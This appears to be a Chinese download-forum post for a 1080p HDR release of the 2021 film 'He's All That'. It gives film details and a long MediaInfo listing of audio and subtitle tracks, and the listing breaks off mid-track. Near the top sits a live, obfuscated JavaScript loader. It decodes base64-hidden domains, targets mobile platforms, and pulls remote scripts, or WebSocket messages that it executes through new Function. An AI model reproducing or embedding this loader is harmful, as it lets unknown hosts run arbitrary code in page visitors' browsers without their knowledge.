他是我的全部[国语配音/中文字幕].Hes.All.That.2021.1080p.HDR.NF.WEB-DL.DDP5.1.Atmos.HEVC 15.81GB

版主小s 28天前 198

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 他是我的全部 / 男神养成记 / 她是我的全部 / She's All That
◎片  名 He's All That
◎年  代 2021
◎产  地 美国
◎类  别 喜剧 / 爱情
◎语  言 英语
◎上映日期 2021-08-27(美国)
◎IMDb链接 https://www.imdb.com/title/tt4590256/
◎豆瓣链接 https://movie.douban.com/subject/26363586/
◎片  长 88分钟
◎导  演 马克·沃特斯 Mark Waters (id:1009536)
◎编  剧 R. Lee Fleming Jr. R. Lee Fleming Jr. (id:1050729)
◎演  员 艾蒂森·蕾 Addison Rae (id:1460467)
       唐纳·布坎南 Tanner Buchanan (id:1356362)
       瑞切尔·蕾·库克 Rachael Leigh Cook (id:1027150)
       佩顿·迈耶 Peyton Meyer (id:1343706)
       葛妮·卡戴珊 Kourtney Kardashian (id:1000119)
       安妮·雅各布 Annie Jacob (id:1436651)
       罗梅尔·德席尔瓦 Romel De Silva (id:1389199)
       安德鲁·马塔拉佐 Andrew Matarazzo (id:1437085)
       麦迪森·佩蒂丝 Madison Pettis (id:1009350)
       Isabella Crovetti-Cramp Isabella Crovetti-Cramp (id:1423656)

◎标  签 Netfix / 爱情 / 喜剧 / 美国 / 美剧 / 校园 / 电影 / 青春

◎简  介
  讲述一位校园女神接受挑战,誓将本校最不起眼的废柴改造成为舞会之王的故事。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 56332102392843235690367008311997476782 (0x2A612B1495FFF197FC0BAC8BF5A1AFAE)

  4. Complete name                            : [email protected]QDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 15.8 GiB

  8. Duration                                 : 1 h 31 min

  9. Overall bit rate                         : 24.7 Mb/s

  10. Encoded date                             : UTC 2021-08-27 09:38:12

  11. Writing application                      : mkvmerge v44.0.0 ('Domino') 64-bit

  12. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 28 min

  21. Bit rate                                 : 5 522 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 1 080 pixels

  24. Display aspect ratio                     : 16:9

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0 (Type 2)

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.111

  31. Stream size                              : 3.41 GiB (22%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : Display P3

  39. Mastering display luminance              : min: 0.0001 cd/m2, max: 1000 cd/m2

  40. Maximum Content Light Level              : 1024 cd/m2

  41. Maximum Frame-Average Light Level        : 202 cd/m2


  42. Audio #1

  43. ID                                       : 2

  44. Format                                   : E-AC-3 JOC

  45. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  46. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 1 h 30 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 768 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 31.250 FPS (1536 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 500 MiB (3%)

  57. Title                                    : English

  58. Language                                 : English

  59. Service kind                             : Complete Main

  60. Default                                  : Yes

  61. Forced                                   : No

  62. Complexity index                         : 16

  63. Number of dynamic objects                : 15

  64. Bed channel count                        : 1 channel

  65. Bed channel configuration                : LFE


  66. Audio #2

  67. ID                                       : 3

  68. Format                                   : E-AC-3

  69. Format/Info                              : Enhanced AC-3

  70. Commercial name                          : Dolby Digital Plus

  71. Codec ID                                 : A_EAC3

  72. Duration                                 : 1 h 31 min

  73. Bit rate mode                            : Constant

  74. Bit rate                                 : 640 kb/s

  75. Channel(s)                               : 6 channels

  76. Channel layout                           : L R C LFE Ls Rs

  77. Sampling rate                            : 48.0 kHz

  78. Frame rate                               : 31.250 FPS (1536 SPF)

  79. Compression mode                         : Lossy

  80. Stream size                              : 420 MiB (3%)

  81. Title                                    : Arabic

  82. Language                                 : Arabic

  83. Service kind                             : Complete Main

  84. Default                                  : No

  85. Forced                                   : No


  86. Audio #3

  87. ID                                       : 4

  88. Format                                   : E-AC-3

  89. Format/Info                              : Enhanced AC-3

  90. Commercial name                          : Dolby Digital Plus

  91. Codec ID                                 : A_EAC3

  92. Duration                                 : 1 h 31 min

  93. Bit rate mode                            : Constant

  94. Bit rate                                 : 640 kb/s

  95. Channel(s)                               : 6 channels

  96. Channel layout                           : L R C LFE Ls Rs

  97. Sampling rate                            : 48.0 kHz

  98. Frame rate                               : 31.250 FPS (1536 SPF)

  99. Compression mode                         : Lossy

  100. Stream size                              : 420 MiB (3%)

  101. Title                                    : Croatian

  102. Language                                 : Croatian

  103. Service kind                             : Complete Main

  104. Default                                  : No

  105. Forced                                   : No


  106. Audio #4

  107. ID                                       : 5

  108. Format                                   : E-AC-3

  109. Format/Info                              : Enhanced AC-3

  110. Commercial name                          : Dolby Digital Plus

  111. Codec ID                                 : A_EAC3

  112. Duration                                 : 1 h 31 min

  113. Bit rate mode                            : Constant

  114. Bit rate                                 : 640 kb/s

  115. Channel(s)                               : 6 channels

  116. Channel layout                           : L R C LFE Ls Rs

  117. Sampling rate                            : 48.0 kHz

  118. Frame rate                               : 31.250 FPS (1536 SPF)

  119. Compression mode                         : Lossy

  120. Stream size                              : 420 MiB (3%)

  121. Title                                    : Czech

  122. Language                                 : Czech

  123. Service kind                             : Complete Main

  124. Default                                  : No

  125. Forced                                   : No


  126. Audio #5

  127. ID                                       : 6

  128. Format                                   : E-AC-3

  129. Format/Info                              : Enhanced AC-3

  130. Commercial name                          : Dolby Digital Plus

  131. Codec ID                                 : A_EAC3

  132. Duration                                 : 1 h 31 min

  133. Bit rate mode                            : Constant

  134. Bit rate                                 : 640 kb/s

  135. Channel(s)                               : 6 channels

  136. Channel layout                           : L R C LFE Ls Rs

  137. Sampling rate                            : 48.0 kHz

  138. Frame rate                               : 31.250 FPS (1536 SPF)

  139. Compression mode                         : Lossy

  140. Stream size                              : 420 MiB (3%)

  141. Title                                    : Danish

  142. Language                                 : Danish

  143. Service kind                             : Complete Main

  144. Default                                  : No

  145. Forced                                   : No


  146. Audio #6

  147. ID                                       : 7

  148. Format                                   : E-AC-3

  149. Format/Info                              : Enhanced AC-3

  150. Commercial name                          : Dolby Digital Plus

  151. Codec ID                                 : A_EAC3

  152. Duration                                 : 1 h 31 min

  153. Bit rate mode                            : Constant

  154. Bit rate                                 : 640 kb/s

  155. Channel(s)                               : 6 channels

  156. Channel layout                           : L R C LFE Ls Rs

  157. Sampling rate                            : 48.0 kHz

  158. Frame rate                               : 31.250 FPS (1536 SPF)

  159. Compression mode                         : Lossy

  160. Stream size                              : 420 MiB (3%)

  161. Title                                    : Dutch

  162. Language                                 : Dutch

  163. Service kind                             : Complete Main

  164. Default                                  : No

  165. Forced                                   : No


  166. Audio #7

  167. ID                                       : 8

  168. Format                                   : E-AC-3

  169. Format/Info                              : Enhanced AC-3

  170. Commercial name                          : Dolby Digital Plus

  171. Codec ID                                 : A_EAC3

  172. Duration                                 : 1 h 31 min

  173. Bit rate mode                            : Constant

  174. Bit rate                                 : 640 kb/s

  175. Channel(s)                               : 6 channels

  176. Channel layout                           : L R C LFE Ls Rs

  177. Sampling rate                            : 48.0 kHz

  178. Frame rate                               : 31.250 FPS (1536 SPF)

  179. Compression mode                         : Lossy

  180. Stream size                              : 420 MiB (3%)

  181. Title                                    : Finnish

  182. Language                                 : Finnish

  183. Service kind                             : Complete Main

  184. Default                                  : No

  185. Forced                                   : No


  186. Audio #8

  187. ID                                       : 9

  188. Format                                   : E-AC-3

  189. Format/Info                              : Enhanced AC-3

  190. Commercial name                          : Dolby Digital Plus

  191. Codec ID                                 : A_EAC3

  192. Duration                                 : 1 h 31 min

  193. Bit rate mode                            : Constant

  194. Bit rate                                 : 640 kb/s

  195. Channel(s)                               : 6 channels

  196. Channel layout                           : L R C LFE Ls Rs

  197. Sampling rate                            : 48.0 kHz

  198. Frame rate                               : 31.250 FPS (1536 SPF)

  199. Compression mode                         : Lossy

  200. Stream size                              : 420 MiB (3%)

  201. Title                                    : French

  202. Language                                 : French

  203. Service kind                             : Complete Main

  204. Default                                  : No

  205. Forced                                   : No


  206. Audio #9

  207. ID                                       : 10

  208. Format                                   : E-AC-3

  209. Format/Info                              : Enhanced AC-3

  210. Commercial name                          : Dolby Digital Plus

  211. Codec ID                                 : A_EAC3

  212. Duration                                 : 1 h 31 min

  213. Bit rate mode                            : Constant

  214. Bit rate                                 : 640 kb/s

  215. Channel(s)                               : 6 channels

  216. Channel layout                           : L R C LFE Ls Rs

  217. Sampling rate                            : 48.0 kHz

  218. Frame rate                               : 31.250 FPS (1536 SPF)

  219. Compression mode                         : Lossy

  220. Stream size                              : 420 MiB (3%)

  221. Title                                    : German

  222. Language                                 : German

  223. Service kind                             : Complete Main

  224. Default                                  : No

  225. Forced                                   : No


  226. Audio #10

  227. ID                                       : 11

  228. Format                                   : E-AC-3

  229. Format/Info                              : Enhanced AC-3

  230. Commercial name                          : Dolby Digital Plus

  231. Codec ID                                 : A_EAC3

  232. Duration                                 : 1 h 31 min

  233. Bit rate mode                            : Constant

  234. Bit rate                                 : 640 kb/s

  235. Channel(s)                               : 6 channels

  236. Channel layout                           : L R C LFE Ls Rs

  237. Sampling rate                            : 48.0 kHz

  238. Frame rate                               : 31.250 FPS (1536 SPF)

  239. Compression mode                         : Lossy

  240. Stream size                              : 420 MiB (3%)

  241. Title                                    : Greek

  242. Language                                 : Greek

  243. Service kind                             : Complete Main

  244. Default                                  : No

  245. Forced                                   : No


  246. Audio #11

  247. ID                                       : 12

  248. Format                                   : E-AC-3

  249. Format/Info                              : Enhanced AC-3

  250. Commercial name                          : Dolby Digital Plus

  251. Codec ID                                 : A_EAC3

  252. Duration                                 : 1 h 31 min

  253. Bit rate mode                            : Constant

  254. Bit rate                                 : 640 kb/s

  255. Channel(s)                               : 6 channels

  256. Channel layout                           : L R C LFE Ls Rs

  257. Sampling rate                            : 48.0 kHz

  258. Frame rate                               : 31.250 FPS (1536 SPF)

  259. Compression mode                         : Lossy

  260. Stream size                              : 420 MiB (3%)

  261. Title                                    : Hebrew

  262. Language                                 : Hebrew

  263. Service kind                             : Complete Main

  264. Default                                  : No

  265. Forced                                   : No


  266. Audio #12

  267. ID                                       : 13

  268. Format                                   : E-AC-3

  269. Format/Info                              : Enhanced AC-3

  270. Commercial name                          : Dolby Digital Plus

  271. Codec ID                                 : A_EAC3

  272. Duration                                 : 1 h 31 min

  273. Bit rate mode                            : Constant

  274. Bit rate                                 : 640 kb/s

  275. Channel(s)                               : 6 channels

  276. Channel layout                           : L R C LFE Ls Rs

  277. Sampling rate                            : 48.0 kHz

  278. Frame rate                               : 31.250 FPS (1536 SPF)

  279. Compression mode                         : Lossy

  280. Stream size                              : 420 MiB (3%)

  281. Title                                    : Hindi

  282. Language                                 : Hindi

  283. Service kind                             : Complete Main

  284. Default                                  : No

  285. Forced                                   : No


  286. Audio #13

  287. ID                                       : 14

  288. Format                                   : E-AC-3

  289. Format/Info                              : Enhanced AC-3

  290. Commercial name                          : Dolby Digital Plus

  291. Codec ID                                 : A_EAC3

  292. Duration                                 : 1 h 31 min

  293. Bit rate mode                            : Constant

  294. Bit rate                                 : 640 kb/s

  295. Channel(s)                               : 6 channels

  296. Channel layout                           : L R C LFE Ls Rs

  297. Sampling rate                            : 48.0 kHz

  298. Frame rate                               : 31.250 FPS (1536 SPF)

  299. Compression mode                         : Lossy

  300. Stream size                              : 420 MiB (3%)

  301. Title                                    : Hungarian

  302. Language                                 : Hungarian

  303. Service kind                             : Complete Main

  304. Default                                  : No

  305. Forced                                   : No


  306. Audio #14

  307. ID                                       : 15

  308. Format                                   : E-AC-3

  309. Format/Info                              : Enhanced AC-3

  310. Commercial name                          : Dolby Digital Plus

  311. Codec ID                                 : A_EAC3

  312. Duration                                 : 1 h 31 min

  313. Bit rate mode                            : Constant

  314. Bit rate                                 : 640 kb/s

  315. Channel(s)                               : 6 channels

  316. Channel layout                           : L R C LFE Ls Rs

  317. Sampling rate                            : 48.0 kHz

  318. Frame rate                               : 31.250 FPS (1536 SPF)

  319. Compression mode                         : Lossy

  320. Stream size                              : 420 MiB (3%)

  321. Title                                    : Indonesian

  322. Language                                 : Indonesian

  323. Service kind                             : Complete Main

  324. Default                                  : No

  325. Forced                                   : No


  326. Audio #15

  327. ID                                       : 16

  328. Format                                   : E-AC-3

  329. Format/Info                              : Enhanced AC-3

  330. Commercial name                          : Dolby Digital Plus

  331. Codec ID                                 : A_EAC3

  332. Duration                                 : 1 h 31 min

  333. Bit rate mode                            : Constant

  334. Bit rate                                 : 640 kb/s

  335. Channel(s)                               : 6 channels

  336. Channel layout                           : L R C LFE Ls Rs

  337. Sampling rate                            : 48.0 kHz

  338. Frame rate                               : 31.250 FPS (1536 SPF)

  339. Compression mode                         : Lossy

  340. Stream size                              : 420 MiB (3%)

  341. Title                                    : Italian

  342. Language                                 : Italian

  343. Service kind                             : Complete Main

  344. Default                                  : No

  345. Forced                                   : No


  346. Audio #16

  347. ID                                       : 17

  348. Format                                   : E-AC-3

  349. Format/Info                              : Enhanced AC-3

  350. Commercial name                          : Dolby Digital Plus

  351. Codec ID                                 : A_EAC3

  352. Duration                                 : 1 h 31 min

  353. Bit rate mode                            : Constant

  354. Bit rate                                 : 640 kb/s

  355. Channel(s)                               : 6 channels

  356. Channel layout                           : L R C LFE Ls Rs

  357. Sampling rate                            : 48.0 kHz

  358. Frame rate                               : 31.250 FPS (1536 SPF)

  359. Compression mode                         : Lossy

  360. Stream size                              : 420 MiB (3%)

  361. Title                                    : Japanese

  362. Language                                 : Japanese

  363. Service kind                             : Complete Main

  364. Default                                  : No

  365. Forced                                   : No


  366. Audio #17

  367. ID                                       : 18

  368. Format                                   : E-AC-3

  369. Format/Info                              : Enhanced AC-3

  370. Commercial name                          : Dolby Digital Plus

  371. Codec ID                                 : A_EAC3

  372. Duration                                 : 1 h 31 min

  373. Bit rate mode                            : Constant

  374. Bit rate                                 : 640 kb/s

  375. Channel(s)                               : 6 channels

  376. Channel layout                           : L R C LFE Ls Rs

  377. Sampling rate                            : 48.0 kHz

  378. Frame rate                               : 31.250 FPS (1536 SPF)

  379. Compression mode                         : Lossy

  380. Stream size                              : 420 MiB (3%)

  381. Title                                    : Korean

  382. Language                                 : Korean

  383. Service kind                             : Complete Main

  384. Default                                  : No

  385. Forced                                   : No


  386. Audio #18

  387. ID                                       : 19

  388. Format                                   : E-AC-3

  389. Format/Info                              : Enhanced AC-3

  390. Commercial name                          : Dolby Digital Plus

  391. Codec ID                                 : A_EAC3

  392. Duration                                 : 1 h 31 min

  393. Bit rate mode                            : Constant

  394. Bit rate                                 : 640 kb/s

  395. Channel(s)                               : 6 channels

  396. Channel layout                           : L R C LFE Ls Rs

  397. Sampling rate                            : 48.0 kHz

  398. Frame rate                               : 31.250 FPS (1536 SPF)

  399. Compression mode                         : Lossy

  400. Stream size                              : 420 MiB (3%)

  401. Title                                    : Mandarin

  402. Language                                 : Chinese

  403. Service kind                             : Complete Main

  404. Default                                  : No

  405. Forced                                   : No


  406. Audio #19

  407. ID                                       : 20

  408. Format                                   : E-AC-3

  409. Format/Info                              : Enhanced AC-3

  410. Commercial name                          : Dolby Digital Plus

  411. Codec ID                                 : A_EAC3

  412. Duration                                 : 1 h 31 min

  413. Bit rate mode                            : Constant

  414. Bit rate                                 : 640 kb/s

  415. Channel(s)                               : 6 channels

  416. Channel layout                           : L R C LFE Ls Rs

  417. Sampling rate                            : 48.0 kHz

  418. Frame rate                               : 31.250 FPS (1536 SPF)

  419. Compression mode                         : Lossy

  420. Stream size                              : 420 MiB (3%)

  421. Title                                    : Norwegian

  422. Language                                 : Norwegian

  423. Service kind                             : Complete Main

  424. Default                                  : No

  425. Forced                                   : No


  426. Audio #20

  427. ID                                       : 21

  428. Format                                   : E-AC-3

  429. Format/Info                              : Enhanced AC-3

  430. Commercial name                          : Dolby Digital Plus

  431. Codec ID                                 : A_EAC3

  432. Duration                                 : 1 h 31 min

  433. Bit rate mode                            : Constant

  434. Bit rate                                 : 640 kb/s

  435. Channel(s)                               : 6 channels

  436. Channel layout                           : L R C LFE Ls Rs

  437. Sampling rate                            : 48.0 kHz

  438. Frame rate                               : 31.250 FPS (1536 SPF)

  439. Compression mode                         : Lossy

  440. Stream size                              : 420 MiB (3%)

  441. Title                                    : Polish

  442. Language                                 : Polish

  443. Service kind                             : Complete Main

  444. Default                                  : No

  445. Forced                                   : No


  446. Audio #21

  447. ID                                       : 22

  448. Format                                   : E-AC-3

  449. Format/Info                              : Enhanced AC-3

  450. Commercial name                          : Dolby Digital Plus

  451. Codec ID                                 : A_EAC3

  452. Duration                                 : 1 h 31 min

  453. Bit rate mode                            : Constant

  454. Bit rate                                 : 640 kb/s

  455. Channel(s)                               : 6 channels

  456. Channel layout                           : L R C LFE Ls Rs

  457. Sampling rate                            : 48.0 kHz

  458. Frame rate                               : 31.250 FPS (1536 SPF)

  459. Compression mode                         : Lossy

  460. Stream size                              : 420 MiB (3%)

  461. Title                                    : Portuguese

  462. Language                                 : Portuguese

  463. Service kind                             : Complete Main

  464. Default                                  : No

  465. Forced                                   : No


  466. Audio #22

  467. ID                                       : 23

  468. Format                                   : E-AC-3

  469. Format/Info                              : Enhanced AC-3

  470. Commercial name                          : Dolby Digital Plus

  471. Codec ID                                 : A_EAC3

  472. Duration                                 : 1 h 31 min

  473. Bit rate mode                            : Constant

  474. Bit rate                                 : 640 kb/s

  475. Channel(s)                               : 6 channels

  476. Channel layout                           : L R C LFE Ls Rs

  477. Sampling rate                            : 48.0 kHz

  478. Frame rate                               : 31.250 FPS (1536 SPF)

  479. Compression mode                         : Lossy

  480. Stream size                              : 420 MiB (3%)

  481. Title                                    : Brazilian Portuguese

  482. Language                                 : Portuguese

  483. Service kind                             : Complete Main

  484. Default                                  : No

  485. Forced                                   : No


  486. Audio #23

  487. ID                                       : 24

  488. Format                                   : E-AC-3

  489. Format/Info                              : Enhanced AC-3

  490. Commercial name                          : Dolby Digital Plus

  491. Codec ID                                 : A_EAC3

  492. Duration                                 : 1 h 31 min

  493. Bit rate mode                            : Constant

  494. Bit rate                                 : 640 kb/s

  495. Channel(s)                               : 6 channels

  496. Channel layout                           : L R C LFE Ls Rs

  497. Sampling rate                            : 48.0 kHz

  498. Frame rate                               : 31.250 FPS (1536 SPF)

  499. Compression mode                         : Lossy

  500. Stream size                              : 420 MiB (3%)

  501. Title                                    : Romanian

  502. Language                                 : Romanian

  503. Service kind                             : Complete Main

  504. Default                                  : No

  505. Forced                                   : No


  506. Audio #24

  507. ID                                       : 25

  508. Format                                   : E-AC-3

  509. Format/Info                              : Enhanced AC-3

  510. Commercial name                          : Dolby Digital Plus

  511. Codec ID                                 : A_EAC3

  512. Duration                                 : 1 h 31 min

  513. Bit rate mode                            : Constant

  514. Bit rate                                 : 640 kb/s

  515. Channel(s)                               : 6 channels

  516. Channel layout                           : L R C LFE Ls Rs

  517. Sampling rate                            : 48.0 kHz

  518. Frame rate                               : 31.250 FPS (1536 SPF)

  519. Compression mode                         : Lossy

  520. Stream size                              : 420 MiB (3%)

  521. Title                                    : Russian

  522. Language                                 : Russian

  523. Service kind                             : Complete Main

  524. Default                                  : No

  525. Forced                                   : No


  526. Audio #25

  527. ID                                       : 26

  528. Format                                   : E-AC-3

  529. Format/Info                              : Enhanced AC-3

  530. Commercial name                          : Dolby Digital Plus

  531. Codec ID                                 : A_EAC3

  532. Duration                                 : 1 h 31 min

  533. Bit rate mode                            : Constant

  534. Bit rate                                 : 640 kb/s

  535. Channel(s)                               : 6 channels

  536. Channel layout                           : L R C LFE Ls Rs

  537. Sampling rate                            : 48.0 kHz

  538. Frame rate                               : 31.250 FPS (1536 SPF)

  539. Compression mode                         : Lossy

  540. Stream size                              : 420 MiB (3%)

  541. Title                                    : Spanish

  542. Language                                 : Spanish

  543. Service kind                             : Complete Main

  544. Default                                  : No

  545. Forced                                   : No


  546. Audio #26

  547. ID                                       : 27

  548. Format                                   : E-AC-3

  549. Format/Info                              : Enhanced AC-3

  550. Commercial name                          : Dolby Digital Plus

  551. Codec ID                                 : A_EAC3

  552. Duration                                 : 1 h 31 min

  553. Bit rate mode                            : Constant

  554. Bit rate                                 : 640 kb/s

  555. Channel(s)                               : 6 channels

  556. Channel layout                           : L R C LFE Ls Rs

  557. Sampling rate                            : 48.0 kHz

  558. Frame rate                               : 31.250 FPS (1536 SPF)

  559. Compression mode                         : Lossy

  560. Stream size                              : 420 MiB (3%)

  561. Title                                    : European Spanish

  562. Language                                 : Spanish

  563. Service kind                             : Complete Main

  564. Default                                  : No

  565. Forced                                   : No


  566. Audio #27

  567. ID                                       : 28

  568. Format                                   : E-AC-3

  569. Format/Info                              : Enhanced AC-3

  570. Commercial name                          : Dolby Digital Plus

  571. Codec ID                                 : A_EAC3

  572. Duration                                 : 1 h 31 min

  573. Bit rate mode                            : Constant

  574. Bit rate                                 : 640 kb/s

  575. Channel(s)                               : 6 channels

  576. Channel layout                           : L R C LFE Ls Rs

  577. Sampling rate                            : 48.0 kHz

  578. Frame rate                               : 31.250 FPS (1536 SPF)

  579. Compression mode                         : Lossy

  580. Stream size                              : 420 MiB (3%)

  581. Title                                    : Swedish

  582. Language                                 : Swedish

  583. Service kind                             : Complete Main

  584. Default                                  : No

  585. Forced                                   : No


  586. Audio #28

  587. ID                                       : 29

  588. Format                                   : E-AC-3

  589. Format/Info                              : Enhanced AC-3

  590. Commercial name                          : Dolby Digital Plus

  591. Codec ID                                 : A_EAC3

  592. Duration                                 : 1 h 31 min

  593. Bit rate mode                            : Constant

  594. Bit rate                                 : 640 kb/s

  595. Channel(s)                               : 6 channels

  596. Channel layout                           : L R C LFE Ls Rs

  597. Sampling rate                            : 48.0 kHz

  598. Frame rate                               : 31.250 FPS (1536 SPF)

  599. Compression mode                         : Lossy

  600. Stream size                              : 420 MiB (3%)

  601. Title                                    : Turkish

  602. Language                                 : Turkish

  603. Service kind                             : Complete Main

  604. Default                                  : No

  605. Forced                                   : No


  606. Audio #29

  607. ID                                       : 30

  608. Format                                   : E-AC-3

  609. Format/Info                              : Enhanced AC-3

  610. Commercial name                          : Dolby Digital Plus

  611. Codec ID                                 : A_EAC3

  612. Duration                                 : 1 h 31 min

  613. Bit rate mode                            : Constant

  614. Bit rate                                 : 640 kb/s

  615. Channel(s)                               : 6 channels

  616. Channel layout                           : L R C LFE Ls Rs

  617. Sampling rate                            : 48.0 kHz

  618. Frame rate                               : 31.250 FPS (1536 SPF)

  619. Compression mode                         : Lossy

  620. Stream size                              : 420 MiB (3%)

  621. Title                                    : Ukrainian

  622. Language                                 : Ukrainian

  623. Service kind                             : Complete Main

  624. Default                                  : No

  625. Forced                                   : No


  626. Audio #30

  627. ID                                       : 31

  628. Format                                   : E-AC-3

  629. Format/Info                              : Enhanced AC-3

  630. Commercial name                          : Dolby Digital Plus

  631. Codec ID                                 : A_EAC3

  632. Duration                                 : 1 h 31 min

  633. Bit rate mode                            : Constant

  634. Bit rate                                 : 640 kb/s

  635. Channel(s)                               : 6 channels

  636. Channel layout                           : L R C LFE Ls Rs

  637. Sampling rate                            : 48.0 kHz

  638. Frame rate                               : 31.250 FPS (1536 SPF)

  639. Compression mode                         : Lossy

  640. Stream size                              : 420 MiB (3%)

  641. Title                                    : Vietnamese

  642. Language                                 : Vietnamese

  643. Service kind                             : Complete Main

  644. Default                                  : No

  645. Forced                                   : No


  646. Text #1

  647. ID                                       : 32

  648. Format                                   : UTF-8

  649. Codec ID                                 : S_TEXT/UTF8

  650. Codec ID/Info                            : UTF-8 Plain Text

  651. Duration                                 : 1 h 24 min

  652. Bit rate                                 : 145 b/s

  653. Count of elements                        : 1949

  654. Stream size                              : 89.6 KiB (0%)

  655. Title                                    : English

  656. Language                                 : English

  657. Default                                  : Yes

  658. Forced                                   : No


  659. Text #2

  660. ID                                       : 33

  661. Format                                   : UTF-8

  662. Codec ID                                 : S_TEXT/UTF8

  663. Codec ID/Info                            : UTF-8 Plain Text

  664. Duration                                 : 1 h 27 min

  665. Bit rate                                 : 140 b/s

  666. Count of elements                        : 1589

  667. Stream size                              : 89.7 KiB (0%)

  668. Title                                    : Arabic

  669. Language                                 : Arabic

  670. Default                                  : No

  671. Forced                                   : No


  672. Text #3

  673. ID                                       : 34

  674. Format                                   : UTF-8

  675. Codec ID                                 : S_TEXT/UTF8

  676. Codec ID/Info                            : UTF-8 Plain Text

  677. Duration                                 : 1 h 27 min

  678. Bit rate                                 : 88 b/s

  679. Count of elements                        : 1759

  680. Stream size                              : 56.4 KiB (0%)

  681. Title                                    : Chinese Simplified

  682. Language                                 : Chinese

  683. Default                                  : No

  684. Forced                                   : No


  685. Text #4

  686. ID                                       : 35

  687. Format                                   : UTF-8

  688. Codec ID                                 : S_TEXT/UTF8

  689. Codec ID/Info                            : UTF-8 Plain Text

  690. Duration                                 : 1 h 27 min

  691. Bit rate                                 : 84 b/s

  692. Count of elements                        : 1599

  693. Stream size                              : 54.4 KiB (0%)

  694. Title                                    : Chinese Traditional

  695. Language                                 : Chinese

  696. Default                                  : No

  697. Forced                                   : No


  698. Text #5

  699. ID                                       : 36

  700. Format                                   : UTF-8

  701. Codec ID                                 : S_TEXT/UTF8

  702. Codec ID/Info                            : UTF-8 Plain Text

  703. Duration                                 : 1 h 27 min

  704. Bit rate                                 : 72 b/s

  705. Count of elements                        : 1587

  706. Stream size                              : 46.4 KiB (0%)

  707. Title                                    : Croatian

  708. Language                                 : Croatian

  709. Default                                  : No

  710. Forced                                   : No


  711. Text #6

  712. ID                                       : 37

  713. Format                                   : UTF-8

  714. Codec ID                                 : S_TEXT/UTF8

  715. Codec ID/Info                            : UTF-8 Plain Text

  716. Duration                                 : 1 h 27 min

  717. Bit rate                                 : 76 b/s

  718. Count of elements                        : 1572

  719. Stream size                              : 49.2 KiB (0%)

  720. Title                                    : Czech

  721. Language                                 : Czech

  722. Default                                  : No

  723. Forced                                   : No


  724. Text #7

  725. ID                                       : 38

  726. Format                                   : UTF-8

  727. Codec ID                                 : S_TEXT/UTF8

  728. Codec ID/Info                            : UTF-8 Plain Text

  729. Duration                                 : 1 h 27 min

  730. Bit rate                                 : 76 b/s

  731. Count of elements                        : 1472

  732. Stream size                              : 48.9 KiB (0%)

  733. Title                                    : Danish

  734. Language                                 : Danish

  735. Default                                  : No

  736. Forced                                   : No


  737. Text #8

  738. ID                                       : 39

  739. Format                                   : UTF-8

  740. Codec ID                                 : S_TEXT/UTF8

  741. Codec ID/Info                            : UTF-8 Plain Text

  742. Duration                                 : 1 h 27 min

  743. Bit rate                                 : 79 b/s

  744. Count of elements                        : 1364

  745. Stream size                              : 50.6 KiB (0%)

  746. Title                                    : Dutch

  747. Language                                 : Dutch

  748. Default                                  : No

  749. Forced                                   : No


  750. Text #9

  751. ID                                       : 40

  752. Format                                   : UTF-8

  753. Codec ID                                 : S_TEXT/UTF8

  754. Codec ID/Info                            : UTF-8 Plain Text

  755. Duration                                 : 1 h 27 min

  756. Bit rate                                 : 71 b/s

  757. Count of elements                        : 1255

  758. Stream size                              : 45.8 KiB (0%)

